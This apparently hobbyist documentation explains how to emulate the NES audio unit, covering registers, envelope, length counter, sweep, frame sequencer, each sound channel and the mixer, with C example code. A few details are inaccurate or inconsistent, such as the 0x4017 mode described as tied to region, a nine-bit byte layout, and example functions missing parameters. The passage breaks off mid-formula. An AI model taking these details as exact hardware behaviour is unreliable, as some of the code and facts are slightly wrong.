Timer: The timer is a counter that counts down, when it hits 0, a unit it controls is "clocked", which allows it to do stuff like change the volume or change the frequency, generate IRQs, etc. The timer is simply the CPU cycle, IE, writing 8 to a timer register means the unit gets "clocked" in 8 cycles. The registers that sets the timer basically sets the reload value for the timer, the timer won't be changed immediately, it gets reloaded when the timer counter hits 0. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++APU Memory Map++++++++++++++++++++++++++++++++++++++++++ Here is the memory map for the APU, which lies on the CPU memory map. All of the registers are write only except for 0x4015, which is read and write. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++Pulse Wave 1 Registers+++++++++++++++++++++++++++++++++++++++ 0x4000: Duty Cycle, Envelope, Halt flag This register sets the duty cycle for the waveform, sets the constant volume (envelope) parameter, and the halt flag (Also known as the loop flag for the length counter.) The duty cycle is set to a a sequence table shown later, the current position of the sequencer is not changed, however. Byte layout: DDLE.EEEE (D) duty, (L) length counter halt, (E) envelope 0x4001: Sweep unit This controls the sweep unit of the pulse wave, the sweep unit can silence the channel, or change the period of the wave. Byte layout: EPPP NSSS (E) enabled, (P) period, (N) negate, (S) shift count 0x4002: Timer lower 8 bits This is the lower 8 bits of the 12 bit value that makes up the timer value. You can only set 11 bit of the 12 bit value, basically it is %HHHL.LLLLLLL0 + 2 for the timer. Byte layout: LLLL LLLL (timer lower 8 bit) 0x4003: Length counter load, Timer upper 3 bit The lower 3 bits makes up the 8-10th position of the 12 bit value, while the upper 5 bits is the value we get from the length table. It also resets the duty cycle (the duty cycle is restarted at the first value of the current sequence), the envelope is also restarted (covered later in envelope section) Byte layout: LLLL.LHHH (L) length counter load, (H) (timer upper 3 bit) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++Pulse Wave 2 Registers++++++++++++++++++++++++++++++++++++++++++++ 0x4004: Duty Cycle, Envelope, Halt flag This register sets the duty cycle for the waveform, sets the constant volume (envelope) parameter, and the halt flag (Also known as the loop flag for the length counter.) The duty cycle is set to a a sequence table shown later, the current position of the sequencer is not changed, however. Byte layout: DDLE.EEEE (D) duty, (L) length counter halt, (E) envelope 0x4005: Sweep unit This controls the sweep unit of the pulse wave, the sweep unit can silence the channel, or change the period of the wave. Byte layout: EPPP.NSSS (E) enabled, (P) period, (N) negate, (S) shift count 0x4006: Timer lower 8 bits This is the lower 8 bits of the 12 bit value that makes up the timer value. You can only set 11 bit of the 12 bit value, basically it is %HHHL.LLLLLLL0 + 2 for the timer. Byte layout: LLLL.LLLL (timer lower 8 bit) 0x4007: Length counter load, Timer upper 3 bit The lower 3 bits makes up the 8-10th position of the 12 bit value, while the upper 5 bits is the value we get from the length table. It also resets the duty cycle (the duty cycle is restarted at the first value of the current sequence), the envelope is also restarted (covered later in envelope section) Byte layout: LLLL.LHHH (L) length counter load, (H) (timer upper 3 bit) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++Triangle Registers++++++++++++++++++++++++++++++++++++++++++ 0x4008: Length counter halt flag/linear counter control, and linear counter reload value. This register controls wheter or not if the sound is looped or not, and the linear counter reload value (the time before the triangle wave stops cycling. The linear counter is a higher resolution length counter, as you can use fill it with an arbitary value of 7 bit precision while the length counter value is loaded from a table. Byte layout: CRRR.RRRR (C) Control flag/Length counter halt flag, (R) Linear counter reload value. 0x4009: Unused This location is unused. 0x400A: Timer lower 8 bits This is the timer lower 8 bits of an 11 bit value, which is %HHH.LLLLLLLL + 1. Byte layout: LLLL.LLLL (L) Timer lower 8 bits value. $400B: Length Counter and timer upper 3 bits. The lower 3 bits makes up the 8-10th position of the 11 bit value, while the upper 5 bits is the length counter load. It sets the halt flag which is discussed later too. Byte layout: LLLL.LHHH (L) Length counter load, (H) Timer high ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++Noise Registers++++++++++++++++++++++++++++++++++++++++++++ 0x400C: Length counter halt and envelope write This register controls the length counter halt, and sets the envelope (volume). Byte layout: UUULE.EEEE (U) Unused, (L) Length counter halt, (E) envelope 0x400D: Unused This location is unused 0x400E: Loop flag and the period (timer) This register controls the loop flag for the noise, which outputs a 93 bit sequence depending on where the position is, or 32767 bit sequence if not. The timer is not controlled by a variable write, and instead looked up in a table for the noise, given later. Byte layout: LUUU.PPPP (L) Loop flag, (U) Unused, (P) Period/Timer 0x400F: Length counter load and envelope restart This register loads the length counter value, and then restart the envelope (set the start flag) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++DMC Registers+++++++++++++++++++++++++++++++++++++++++++++++++ 0x4010: IRQ Enable, loop toggle, and setting the frequency This register determines if the IRQ flag is set or not, if the flag is cleared, the DMC interrupt flag is cleared. The loop flag tells the DMC wheter or not it should reloads the sample address and sample length to start playing again, and the frequency tells the amount of time before a sample is played. Byte layout: ILUU.FFFF (I) IRQ enabled flag, (U) Unused, (F) Freqency value from an index table 0x4011: Direct Load This register directly loads a byte into the sample buffer bypassing any read, sometimes it will not change properly, the NESDEV community hasn't worked out this "sometimes state", so you can ignore it in emulation. Byte layout: UDDD.DDDD (U) Unused, (D) The value loaded 0x4012: Sample Address This register sets the sample address for the DMC to start playing at. It is in the form of %11AAAAAA.AA000000 (Meaning the sample address range can be set to [0xC000, 0xFFC0] Byte layout: AAAAAA.AA (A) Address for the sample. 0x4013: Sample Length This register sets the sample length of the address, It is in the form of %LLLL.LLLL0001, meaning the range for the sample length is [0x001, 0xFF1]. Byte layout: LLLL.LLLL (L) Sample length value. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++Other APU Regs+++++++++++++++++++++++++++++++++++++++++++++ 0x4015: Status register This register returns the status register for the APU when read, when written, this register set the DMC enable flag, and the length counter enable for the noise/triangle/pulse channels. When read, the frame interrupt flag gets cleared, but *NOT* the DMC interrupt flag, if the frame interrupt flag was set at the same moment of the read, then it will read back as 1, but it will not be cleared. After a write, the DMC interrupt flag is cleared, but not the frame interrupt. Byte layout for a read: IFUD.NT21: (I) DMC interrupt flag, (F) Frame interrupt Flag, (U) Unused, (D) Set if DMC bytes remaining is non-zero, unset if it is 0, (N) Set if noise length counter is non-zero, unset if it is 0, (T) Set if triangle length counter is non-zero, unset if it is 0, (2) Set if pulse wave 2 length counter is non-zero, unset if it is 0. (1) Set if pulse wave 1 length counter is non-zero, unset if it is 0. Byte layout for a write: UUUD.NT21: (U) Unused, (D) If cleared, the DMC bytes remaining is set to 0, otherwise, the DMC sample is only restarted if the DMC's bytes remaining is 0. (N) Noise channel length counter enable flag. (T) Triangle channel length counter enable flag. (2) Pulse wave 2 length counter enable flag. (1) Pulse wave 1 length counter enable flag. 0x4017: Frame counter control This register selects a frequencer for the frame counter. The frame counter clocks the envelope/triangle counter along with length counter and sweep unit. It can optionally generate an IRQ at the end. Here is the byte layout: MIUU.UUUU (M) Select sequencer mode, 0 for 4 step (NTSC), 5 for step (PAL), but the NES can use both regions. The 5 step sequencer does not generate an IRQ at the end of the sequence. (I) Interrupt inhibit, if set, the frame interrupt flag is cleared, otherwise, it is unaffected. I am not sure if this is the right behavior of the APU open bus, but it seems that the APU returns open bus based on the last byte on the CPU, that is, whatever CPU just read PRG rom etc. the APU open bus will return that. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++The Gritty Details of the APU++++++++++++++++++++++++++++++++++ The APU unit basically runs the 2 pulse waves, triangle, noise, and dmc, and the frame sequencer every cycle, and they are mixed in the APU DAC at the end, outputting them as analog signals to make sounds. Any changes to the unit's output by writing to a register takes effect on the *NEXT* cycle. The APU speed is mainly judged by the timing method you use and the downsampling algorithm you use, the APU doesn't affect the speed as much as the PPU does. ========Code Example====================================================== void apu_run() //per cycle code...adjust this to your needs { pulse_run(0); //channel 1 pulse_run(1); //channel 2 triangle_run(); noise_run(); dmc_run(); frame_sequencer(); //mix samples gotten to sound API //since the units run concurrently, the APU frame sequencer //is ran last because //it can change the ouput values of the pulse/triangle channels, //we want the //changes to affect it on the *next* cycle. } ========================================================================== ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++Envelope unit+++++++++++++++++++++++++++++++++ The pulse and the noise channel have an envelope unit (volume) that does pretty much the same thing, so I'll cover the envelope unit as one main sub unit of itself. Here is a recap of which register controls the envelope. 0x4000 and 0x4003 for pulse 1, 0x4004 and 0x4007 for pulse 2, and 0x400C and 0x400F for the noise channel. Here is the byte layout: UULC.NNNN (U) means not related to envelope in this case. That is the byte layout for registers 0x4000, 0x4004, and 0x4007, the N parameter is the constant output volume if the C (constant) bit was set for one of the register, the divider period is set to N + 1 (I guess the reason is for the case is if N is 0). If the constant output volume is not used, the envelope unit uses the counter as a volume output, the counter is a 0 to 15 value clocked by the divider. As for register 0x4003, 0x4007, and 0x400F, their side effects is that they set a "start" flag which is used when the frame counter clocks the The divider is clocked when the frame counter is clocked, which produces 1 of actions. 1) If the start flag is clear, the divider is clocked (the divider counter is decremented), 2) If the start flag is set, the start flag is cleared, and the counter (the 0 to 15 value one) is loaded with 15, and the divider period's is immediately reloaded. When the divider outputs a clock (the divider counter is 0), if the envelope counter (0 to 15 value) is not 0, it is decremented, if it is, it checks if the L (loop flag) is set, if it is, then the counter is loaded with 15. (The decrementing counter is probably used for fade effects, since the volume gets smaller everytime.) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++Length Counter Unit++++++++++++++++++++++++++++++++++ The pulse, triangle, and noise channels has the same behavior for the length counter, so I'll cover them here like the envelope unit. The length counter allows duration control for the channels, when the length counter hits 0, the channel is silence. Writes to the register 0x4015 enables length counter for the noise/triangle/pulse 2/pulse 1 channels, if it is not enabled however, then the length counter is forced to be 0 and cannot be changed until enable bit is set for the specified channel. Here is the byte layout again: ----.NT21 (N) Noise, (T) Triangle, (2) Pulse Wave 2, (1) Pulse Wave 1 for 0x4015 write, only the relevant bits to the length counter are shown. Registers 0x4000, 0x4004, 0x400C bit 5 sets the halt length counter flag, bit 7 of 0x4008 for the triangle channel. It's also the envelope loop flag, since if the length counter is halted, then the output unit always output a constant volume, because since there is no silencing, we can't have fade effects. Register 0x4003, 0x4007, 0x400B, 0x400F upper 5 bits sets the value for the length counter, it is the index for a table of length value, here is the table for the length counter: const unsigned char len_table[32] = { 10,254, 20, 2, 40, 4, 80, 6, 160, 8, 60, 10, 14, 12, 26, 14, 12, 16, 24, 18, 48, 20, 96, 22, 192, 24, 72, 26, 16, 28, 32, 30 }; The length counter is loaded and then clocked by the frame counter twice per frame. When clocked by the frame counter, the length counter is decremented except when the counter is already 0, or the length counter halt flag is set. Here is the edge case behavior when one writes to the length counter registers near the frame counter clocking. The frame counter clocks the length counter 2 times, let say one of the clocks occured at 14915, if the register gets written to that halts the length counter flag, the length is not clocked if it was halted at cycle 14914, clocked at 14915 clocked when unhalted at cycle 14915, and not clocked when unhalted at 14915. For the length counter reloading, reload just before and after the frame counter clock works normally, reload during the length clock when counter equals 0 also works normally, but a length counter reload when the counter is greater than 0 should be ignored. (thats the 0x4003, etc writes) ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++Sweep Units+++++++++++++++++++++++++++++++++++++ The pulse wave channels are the only unit with the sweep unit. The sweep unit is controlled through 0x4001 (pulse wave 1) and the 0x4005 (pulse wave 2). Here is the byte layout for both of the regs, EPPP.NSSS The sweep unit contains an internal shifter that continuously (always running) calculates a result based on the raw 11 bits timer, remember that the square timer is 12 bits so the 11 bit you write to the register are shifted left by 1 and add by 2). You don't really need to calculate this every cycle, just (re)calculate it when the raw period changes (It changes through a memory write.) The raw period is shifted by right by (S) shift count, if the (N) negate flag is set, the shifted value is inverted, and then added to the raw period, making the final result. For pulse wave 2, after the value is inverted we add 1, and then add to the raw period for the final result. Basically it is one's complement addition for the pulse channel 1, and 2 complements addition for pulse channel 2. When the channel is less than 8 or when the shifter result is greater than 0x7FF and the (N) negate flag is cleared, the channel is silenced, if the enabled flag is set and the shift count is non-zero, the channel's raw period is set to the shifter result when the divider outputs a clock (divider's period is (P) + 1, the plus 1 is accounting for when (P) is 0). The divider is clocked by the frame sequencer. ==================Sweep Unit Example Code================================= /* we don't take account in the left shift by 1 then add 2 for the timer raw reload value */ void wr_reg4002(u8 data) { pulse1_timer_raw_reload_value = (timer_reload_value & ~0xFF) | data; calc_sweep_unit(0); } void wr_reg4003(u8 data) { pulse1_timer_raw_reload_value = (timer_reload_value & 0xFF) | ((data & 0x07) << 8)); calc_sweep_unit(0); } void wr_reg4006() { pulse2_timer_raw_reload_value = (timer_reload_value & ~0xFF) | data; calc_sweep_unit(1); } void wr_reg4007() { pulse2_timer_raw_reload_value = (timer_reload_value & 0xFF) | ((data & 0x07) << 8)); calc_sweep_unit(1); } void calc_sweep_unit(int chan) { int c = 1 | (chan << 2); //1's complement for chan 0, 2's complement if chan 1 if (reg[c] & 0x08) //check to see if negate is on swp_val_result[chan] = ~swp_val_result[chan] + chan; //add with the shifter chan swp_val_result[chan] += timer[chan]; //we can use swp_silence as an & for pulse wave output //IE, pulse_output & swp_silence; if ( (timer[chan] < 8) || ((swp_val_result[chan] > 0x7FF) && !(reg[c] & 8)) ) swp_silence[chan] = 0; //silence else swp_silence[chan] = 0xFF; //don't silence } void frame_sequencer() { //code that counts cycles until clocking time... //check if sweep unit enable flag is on... //assume in this example... pulse1_timer_raw_reload_value = swp_val_result[0] & 0x7FF; pulse2_timer_raw_reload_value = swp_val_result[1] & 0x7FF; } ========================================================================== ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++Frame Sequencer++++++++++++++++++++++++++++++++++++++++++ The frame sequencer is a unit that can generate low frequency clocks for the channels with an optional 60 Hz interrupt. There are 2 sequences that the frame sequencer can select from, and they are selected by writing to register 0x4017 (bit 7). Having bit 7 unset selects a 4 step sequence, which is ~240 Hz times a frame, the length and sweep units ~120 Hz times, and ~60 Hz IRQ interrupt. Having the bit 7 set selects a 5 step sequence, which is ~192 Hz times a frame, and the length and sweep units is ~96 Hz, there is no generation of IRQ in the 5 step sequence. When writing to the 0x4017 register, the step sequencer resets the position, starting from the beginning. To get the cycles when the frame counter takes a step, you simply do CPU_FREQUENCY/FRAME_SEQUENCE_HZ. 1789772/240 = ~7457 cycles for NTSC, 1662607/192 = ~8659 cycles for PAL. Blargg made an accurate table describing exactly when the frame sequencer takes a step, thanks! Here it is: Action Envelopes & Length Counter& Interrupt Delay to next Linear Counter Sweep Units Flag NTSC PAL - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - $4017=$00 - - - 7459 8315 Step 1 Clock - - 7456 8314 Step 2 Clock Clock - 7458 8312 Step 3 Clock - - 7458 8314 Step 4 Clock Clock Set if enabled 7458 8314 Mode 1: 5-step sequence Action Envelopes & Length Counter& Interrupt Delay to next Linear Counter Sweep Units Flag NTSC PAL - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - $4017=$80 - - - 1 1 Step 1 Clock Clock - 7458 8314 Step 2 Clock - - 7456 8314 Step 3 Clock Clock - 7458 8312 Step 4 Clock - - 7458 8314 Step 5 - - - 7452 8312 Note: the IRQ flag is actually effectively set three clocks in a row, starting one clock earlier than shown. NTSC and PAL times shown for comparison. As we can see, the 5 step sequence has a 1 cycle delay then it clocks the length counter and sweep units right away, as documented by blargg also, the IRQ is set 3 times in a row in 3 cycles (29830, 29831, 29832 for example in NTSC). What happens to the units as they are clocked is described in their individual sections. ++++++++++++++++++++Pulse Wave Channels+++++++++++++++++++++++++++++++++++ The pulse wave unit can be described by a diagram here (taken from nesdevwiki, thanks!) Timer ---> Sequencer Sweep Length Counter | | | | | | v v v Envelope -------> Gate-----> Gate -----> Gate ---> (to mixer) The timer is set by the registers forming %HHHL.LLLLLLL0 value + 2, I am guessing the justification for the shift is because they wanted a lower frequency range to be in the human's audible range, since without the shift, the highest frequency is >20 kHz, while the human hearing range is only 20 kHz. The plus 2 instead of plus 1 is because the timer can also be looked as (timer + 1) << 1, so in a way, it does make sense, the hardware probably added the 1 to account for the timer raw period being 0, and then shifted it. As the timer counts down to 0, it gets reloads its value from the value we wrote to the registers (0x4002 and 0x4006, 0x4003 and 0x4007) and it increments the sequencer value, the sequencer outputs an 8 bit sequence depending on the duty cycle we wrote to the register (0x4000 upper 2 bits). Here is the table for the duty cycles, Duty Cycle Sequences Duty Waveform sequence 0: 0 1 0 0 0 0 0 0 (12.5%) 1: 0 1 1 0 0 0 0 0 (25%) 2: 0 1 1 1 1 0 0 0 (50%) 3: 1 0 0 1 1 1 1 1 (25% negated (75%)) I am not sure why the NES had a 75% since 75% is a 180 degree out of phase with 25%, so theoretically it should sound the same. When the sequencer is at a 1 then the envelope is outputted, either the constant volume or the envelope counter, when it is 0, the channel is silenced. If the envelope manages to get through the sequencer without being silenced, then it goes through the sweep, where it gets calculated by the internal shifter, the sweep can silence the envelope if the raw period is less than 8 or the shifter value is over 0x7FF and the sweep unit's negate flag is cleared, then the channel is silenced, then it goes through the length counter, if the length counter is not 0, then the sample can finally be outputted. The behavior is for pulse wave 1 and 2 channel are the same, the only difference is their sweep units documented in the sweep section. =========Pulse Wave Code Example========================================== void pulse_run(int chan) //this example code runs every cpu cycle { //sweep units are figured out during memory writes to the regs //that set the timer, length counter are figured out in the //writes and frame counter, and envelope is set through the memory //regs also, so we just need to deal with the timer and sequencer here if (!--timer_period[chan]) { sq_seq[chan] = (sq_seq[chan] + 1) & 7; //reload timer timer_period[chan] = timer[chan] + 2; } if (sq_seq[chan]) //we are outputting something { if (envelope_is_constant_for_this_chan) sample[chan] = envelope_value; else sample[chan] = envelope_cnt_value; sample[chan] &= sweep_silence_or_not; if (!len_cnt[chan]) //length counter is 0 sample[chan] = 0; //silenced } else sample[chan] = 0; //duty cycle is 0, silenced. } ========================================================================== ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++Triangle Channel+++++++++++++++++++++++++++++++++++++ The triangle wave unit can be described by a diagram here (taken from nesdevwiki, thanks!) Linear Counter Length Counter | | v v Timer ---> Gate ----------> Gate ---> Sequencer ---> (to mixer) The timer reload period is set from the 0x400A and 0x400B register plus 1 (for cases of when the raw reload period is 0). When it hits 0, it reloads itself using that value. When the timer ouputs a clock, it clocks the sequencer, that is, increment the index value only if the linear counter and the length counter is not 0. The linear counter is clocked by the frame sequencer shown above in the table, here are the 2 actions that occurs when the frame sequencer clocks the linear counter. 1. If the halt flag (the halt flag is automatically set on writes to 0x400B) is set, the linear counter is reloaded with the counter reload value, otherwise if the linear counter is non-zero, it is decremented. 2. If the control flag (bit 7 of 0x4008) is clear, the halt flag is cleared. The sequencer sends a 32 looped sequence to the APU mixer. const unsigned char triangle_sample_val[32] { 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, 0 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 }; ========Code example for the triangle channel============================= void triangle_run() //per cycle code { //when clocked by timer //seq steps forward //except when linear counter or //length counter is 0 //length counter and linear counter //is clocked in frame counter. if (!--triangle_timer_period) { if (tri_len_cnt && tri_linear_cnt) tri_seq = (tri_seq + 1) & 0x1F; triangle_timer_period = tri_timer_reload + 1; } triangle_sample = triangle_sample_val[tri_seq]; } ========================================================================== ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++Noise Channel++++++++++++++++++++++++++++++++++++++ The noise unit can be described by a diagram here (taken from nesdevwiki, thanks!) Timer --> Shift Register Length Counter | | v v Envelope -------> Gate ----------> Gate --> (to mixer) The timer is looked up in a table from writes to bit 0 to 3, which sets the reload value. Here is the table, Rate: 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0A 0x0B 0x0C 0x0D 0x0E 0x0F ----------------------------------------------------------- NTSC: 4, 8, 16, 32, 64, 96, 128, 160, 202, 254, 380, 508, 762, 1016, 2034, 4068 PAL: 4, 7, 14, 30, 60, 88, 118, 148, 188, 236, 354, 472, 708, 944, 1890, 3778 The table corresponds to a note on musical note. As the timer counts to 0, it gets reloaded with the timer value, and the timer clocks the shift register (the pseudo random number sequence 16 bit wide). 1. Bit 15 of the shift register is replaced with the XOR of bit 0 and one other bit: bit 6 if loop flag (bit 7 of 0x400E) is set, otherwise bit 1. Shift register bits: %F-------.-6----10 2. The shift register is then shifted right one, the original bit 0 is lost. The envelope is outputted to the mixer when the bit 0 of the shift register is unset or when the length counter is not 0, the shift register is loaded with 1 on power up (LSFR needs a initial state, if it was 0, then nothing would change.) The result is a pseudo random bit sequence 32767 bits long when the loop is set. When the loop is cleared, it is 93-bit long sequence somewhere in the 32767 sequence depending on when the loop flag was set. A simple program can be written to calculate how long it is. When the noise channel is silence, one can get away from doing the tedious calculation every single cycle by looking ahead N amount of value, blargg wrote a program that generates the bit operation for the N lookahead formula that matches the behavior that takes N cycles of the standard XORing and such. You can get the program that generates it here: http://h1.ripway.com/blargg/temp/iterated_lfsr.zip, so for when the noise is silenced and then turned back on, you can just figure out how many cycles it had been since and apply the lsfr look ahead. ==========Code Example for the Length of the Bit Sequence================= #include int main(void) { unsigned long loop_flg_unset = 0, loop_flg_set = 0; unsigned int reg = 1; do { reg &= 0x7FFF; reg |= (((reg & 0x01) ^ ((reg & 0x02) >> 1)) << 15); reg >>= 1; ++loop_flg_unset; } while (reg != 1); do { reg &= 0x7FFF; reg |= (((reg & 0x01) ^ ((reg & 0x40) >> 6)) << 15); reg >>= 1; ++loop_flg_set; } while (reg != 1); printf("Unset: %d Set: %d\n", loop_flg_unset, loop_flg_set); return 0; } ========================================================================== ==============Code Example for Noise Channel============================== void noise_run() { if (!--noise_timer_period) { noise_shift_reg &= 0x7FFF; if (reg[0x0E] & 0x80) //loop flg set noise_shift_reg |= (((noise_shift_reg & 0x01) ^ ((noise_shift_reg & 0x40) >> 6)) << 15); else noise_shift_reg |= (((noise_shift_reg & 0x01) ^ ((noise_shift_reg & 0x02) >> 1)) << 15); noise_shift_reg >>= 1; //reload, if timer period was change it is reloaded here //not immediately in the timer period set reg noise_timer_period = noise_period_table[*region][reg[0x0E] & 0xF]; } if (!(noise_shift_reg & 1) && noise_len_cnt) { if (envelope_is_constant) noise_sample = envelope_parameter_set_in_0x400C; else noise_sample = noise_envelope_cnt; } else noise_sample = 0; } ========================================================================== ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++DMC Channel+++++++++++++++++++++++++++++++++++++++++ The DMC unit can be described by a diagram here (taken from nesdevwiki, thanks!) Timer | v Reader ---> Buffer ---> Output ---> Counter ---> (to mixer) The DMC is able to read bytes from the ROM space to output DPCM based samples. It loads data into it's internal sample buffer. The sample buffer is either holding a 1 byte (8 bit) sample in the sample buffer, or is empty. The sample buffer can only be emptied by the Output unit in the diagram above. When the sample buffer is emptied by the Output unit, the Reader fills the sample buffer with the next byte from the currently playing sample using the address specified in 0x4012. When a sample is (re)started, the sample address is set to the address specified in 0x4012, Sample address = %11AAAAAA.AA000000, and the sample length is set to the value inside 0x4013, Sample length = %LLLL.LLLL0001. The reader does its work whenever the sample buffer is empty, 1) The sample buffer is filled with the next sample byte read from the current address, subject to whatever mapping hardware is present. The CPU is suspend for four clock cycles. 2) The address is incremented; if it exceeds $FFFF, it is wrapped around to $8000. * The bytes remaining counter is decremented; if it becomes zero and the loop flag is set, the sample is restarted (see above), otherwise if the bytes remaining counter becomes zero and the IRQ enabled flag is set, the interrupt flag is set. Here is a possible explanation as to why the CPU is suspended for 4 clock cycles during the memory read: ========================================================================== Likely internal implementation of the read The following is speculation, and thus not necessarily 100% accurate. It does accurately predict observed behavior. The 6502 cannot be pulled off of the bus normally. The 2A03 DMC gets around this by pulling RDY low internally. This causes the CPU to pause during the next read cycle, until RDY goes high again. The DMC unit holds RDY low for 4 cycles. The first three cycles it idles, as the CPU could have just started an interrupt cycle, and thus be writing for 3 consecutive cycles (and thus ignoring RDY). On the fourth cycle, the DMC unit drives the next sample address onto the address lines, and reads that byte from memory. It then drives RDY high again, and the CPU picks up where it left off. ========================================================================== This leads to some side effects when the CPU is reading some registers such as the 0x4016 (joypad) or the PPU registers when this happens, the joypad and the PPU will see some extra reads, leading to some undesired behavior, such as multiple PPUREG6 increments when reading 0x2007, or the joypad bit gets shifted out. ============Code example of what happens================================== u8 rd(int addr) //per cycle accurate code, so we check for DMC delay here { if (apu.dmc_get_mem_dma) //this is the 4 cycle delay { if ((addr == 0x4016) || (addr == 0x4017)) { run_cyc(); //1st cycle //if this is the joypad registers, it sees it as //1 extra read. (this->*p_read[addr>>12])(addr); --apu.dmc_get_mem_dma; while (--apu.dmc_get_mem_dma) //other 3 cycles run_cyc(); } else { //for other registers, //it sees it as *MULTIPLE READS* //IE, the 0x2007 register sees //4 reads, and increments the 0x2006 //4 times! while (--apu.dmc_get_mem_dma) { run_cyc(); (this->*p_read[addr>>12])(addr); } } //get sample byte apu.dmc_sample_buf = read(apu.dmc_sample_addr); //if sample addr exceeds $FFFF //wrapped around to $8000 if (++apu.dmc_sample_addr & 0x10000) apu.dmc_sample_addr = 0x8000; if (!--apu.dmc_byte_rem) { if (apu.reg[0x10] & 0x40) //loop flg set { //sample restarted apu.dmc_sample_addr = (apu.reg[0x12] << 6)|0xC000; apu.dmc_byte_rem = (apu.reg[0x13] << 4) | 1; } else if (apu.reg[0x10] & 0x80) { //if irq enable flg is set //the dmc interrupt flg get set and irq get set cpu.irq |= DMC_IRQ_FLG; } } apu.dmc_sample_buf_full = true; //read as normal code here... } void wr(int addr, u8 data) { //as for writes the CPU generally //write once, and then goes back into memory read mode, //so just subtract one cycle from the 4 cycle get //and write normally... if (apu.dmc_get_dmc_dma) --apu.dmc_get_dmc_dma; //normal write code... } ========================================================================== As for the output unit, it continuously outputs a 7 bit value to the mixer, when an output cycle ends, a new cycle is started as follow: 1) The bits-remaining counter is loaded with 8 2) If the sample buffer is empty, the silence flag is set, otherwise the silence flag is cleared and the sample buffer is emptied into the shift register. The timer reload value is set by bit 0 to 3 in register 0x4010, where that value is an index to a lookup table that is the reload value. Here is the rate table: Rate: 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 0x08 0x09 0x0A 0x0B 0x0C 0x0D 0x0E 0x0F ------------------------------------------------------------ NTSC: 428, 380, 340, 320, 286, 254, 226, 214, 190, 160, 142, 128, 106, 84, 72, 54 PAL: 398, 354, 316, 298, 276, 236, 210, 198, 176, 148, 132, 118, 98, 78, 66, 50 When the timer outputs a clock, the following actions occur in order: 1. If the silence flag is clear, bit 0 of the shift register is applied to the counter as follows: If bit 0 is clear and the delta-counter is greater than 1, the counter is decremented by 2, otherwise if bit 0 is set and the delta-counter is less than 126, the counter is incremented by 2. 2. The right shift register is clocked. 3. The bits-remaining counter is decremented. If it becomes zero, a new cycle is started. Nothing can interrupt a cycle; every cycle runs to completion before a new cycle is started. Here is example code of how the DMC is ran ========Example code for DMC unit========================================= void dmc_run() { if (!--timer_period[4]) //output clock { timer_period[4] = dmc_rate_table[*region][reg[0x10] & 0xF]; if (dmc_play_flg) //silence flg cleared, playing a sample { //bit 0 of shift reg is applied to counter as follows //if bit 0 is clear and delta counter is greater than 1 //counter is decremented by 2 otherwise if bit 0 is //set and delta counter is less than 126 counter is //incremented by 2 //delta counter is the $4011, or known as //the output of the DMC, thanks nintendulator if (dmc_shift_reg & 1) { if (dmc_cnt < 126) dmc_cnt += 2; } else if (dmc_cnt > 1) dmc_cnt -= 2; update_channel(DMC); } dmc_shift_reg >>= 1; //right shift reg is clocked if (!--dmc_bit_rem) //if bits remaining counter is 0 new cycle //starts { dmc_bit_rem = 8; //reload //when sample buffer is emptied by output unit //memory reloaded if dmc byte remains //if we do it this way, the sample won't be played //until the *NEXT* output cycle, since the shift register //will load the new one the next cycle //from all the docs i read, it seems that //the output unit shift the sample byte into //shift register when output cycle is reloaded //im guessing the shift register, so the 4 //cycle delay in getting the sample won't get //loaded in until the next output cycle, *shrugs* //not sure if this is right if (dmc_sample_buf_full && dmc_byte_rem) { dmc_play_flg = true; dmc_get_mem_dma= 5; //4 cycle delay dmc_sample_buf_full = false; dmc_shift_reg = dmc_sample_buf; } //no byte remain, so sample buf not reloaded, //silence flg set else dmc_play_flg = false; } } } ========================================================================== The mixer recieves the value of the DMC counter, the DMC counter is loaded with 0 on start up. The DMC counter is directly set through 0x4011. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++The APU Mixer+++++++++++++++++++++++++++++++++++++++ The sample we gotten from all the units so far is sent to the mixer, here is how the mixer mixes the sound: Pulse wave 1 and pulse wave 2 outputs a value from 0 to 15. (envelope parameter) Triangle can output a value between 0 and 15. Noise can output a value from 0 to 15 (envelope parameter) DMC can output a value from 0 to 127, here is how the the values relate to each other in the mixer. n is a value that goes from 0 to 30 of size 31. output = pulse_out + tnd_out pulse_table [n] = 95.52 / (8128.0 / n + 100) //we can see here why n is of size 31, //because the pulse 1 and pulse 2 takes on the values //of 15, counting 0. pulse_out = pulse_table [pulse1 + pulse2] The tnd_out table is approximated (within 4%) by using a base unit close to the DMC's DAC. As for the triangle/noise/DMC n is 0 to 202 of size 203. tnd_table [n] = 163.67 / (24329.0 / n + 100) //as you can see, the DMC can change the volume //of the triangle and noise. tnd_out = tnd_table [3 * triangle + 2 * noise + dmc] Here is a linear approximation of the output pulse_out = 0.00752 * (pulse1 + pulse2) tnd_out = 0.00851 * triangle + 0.00494 * noise + 0.00335 * dmc Finally the output is gotten using output 